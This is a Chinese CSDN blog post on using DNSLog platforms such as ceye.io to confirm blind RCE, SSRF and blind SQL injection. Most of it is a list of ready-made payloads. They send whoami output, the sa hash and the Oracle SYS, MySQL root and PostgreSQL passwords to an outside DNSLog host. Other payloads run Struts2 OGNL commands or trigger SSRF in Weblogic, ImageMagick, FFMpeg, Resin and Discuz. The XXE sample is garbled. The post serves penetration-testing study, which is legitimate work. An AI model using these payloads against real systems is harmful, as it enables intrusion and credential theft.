mysql dnslog_DNSLOG | 利用总结

本文介绍了在wb在线面试中遇到的无回显RCE问题的解决方案,即使用DNSLog平台进行验证。详细列举了几个常用的DNSLog服务,如ceye.io、dnslog.cn和开源的DNSLog项目。DNSLog在缺乏回显的漏洞利用中起到关键作用,如RCE、SSRF、Blind SQL等场景。文中以ceye.io为例,展示了在不同操作系统和数据库环境下,如何构造payload进行DNSLog利用,并提供了多种payload实例。
摘要由CSDN通过智能技术生成

0x00  写这篇博客的原因是wb在线的面试中无回显rce的问题在这里填了这个坑

0x10 下面是几个常用的dnslog平台

1 http://ceye.io/

2 http://www.dnslog.cn/

3 https://github.com/BugScanTeam/DNSLog(开源可自行搭建的平台)

0x20 dnslog平台的作用

现在很多漏洞都没有办法去回显,可是我们的payload已经执行,所以我们需要使用一些第三方的dnslog平台去验证我们的漏洞的存在性。dnslog的利用方法主要涉及到以下几种漏洞的情况

1 rce2 ssrf3 blind sql4 ...

0x30 dnslog利用方式

这里通过ceyo.io为例

这里在作者windows系统下测试,发现使用ping `whoami`.1u2gcq.ceye.io这样的命令并不好使结果产生的是找不到主机。

curl http://1u2gcq.ceye.io/whoami也并没有使用回显当前用户的权限。

唯一能够行得通的命令

ping %os%.12345.ceye.io

当%%中的为系统参数可以去执行,如果是本地参数有可能也无法去执行。

下面为一些公开的payload

1 0x00Command Execution2 i. *nix:3 curl http://ip.port.b182oj.ceye.io/`whoami`

4 ping `whoami`.ip.port.b182oj.ceye.io5 ii. windows6 ping %USERNAME%.b182oj.ceye.io7 0x01SQL Injection8 i. SQL Server9 DECLARE @host varchar(1024);10 SELECT @host=(SELECT TOP 1

11 master.dbo.fn_varbintohexstr(password_hash)12 FROM sys.sql_logins WHERE name='sa')13 +'.ip.port.b182oj.ceye.io';14 EXEC('master..xp_dirtree

15 "\\'+@host+'\foobar$"');

16 ii. Oracle17 SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');18 SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;19 SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;20 SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;21 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;22 iii. MySQL23 SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));24 iv. PostgreSQL25 DROP TABLE IF EXISTS table_output;26 CREATE TABLE table_output(content text);27 CREATE OR REPLACE FUNCTION temp_function()28 RETURNS VOID AS $29 DECLARE exec_cmd TEXT;30 DECLARE query_result TEXT;31 BEGIN32 SELECT INTO query_result (SELECT passwd33 FROM pg_shadow WHERE usename='postgres');34 exec_cmd := E'COPY table_output(content)

35 FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';36 EXECUTE exec_cmd;37 END;38 $ LANGUAGE plpgsql SECURITY DEFINER;39 SELECT temp_function();40 0x02XML Entity Injection41 <?xml version="1.0" encoding="UTF-8"?>

42 43

44 %remote;]>

45

46 0x03Others47 i. Struts248 xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}

49 xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}50 ii. FFMpeg51 #EXTM3U52 #EXT-X-MEDIA-SEQUENCE:0

53 #EXTINF:10.0,54 concat:http://ip.port.b182oj.ceye.io

55 #EXT-X-ENDLIST56 iii. Weblogic57 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

58 iv. ImageMagick59 push graphic-context60 viewbox 0 0 640 480

61 fill 'url(http://ip.port.b182oj.ceye.io)'

62 pop graphic-context63 v. Resin64 xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

65 vi. Discuz66 http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值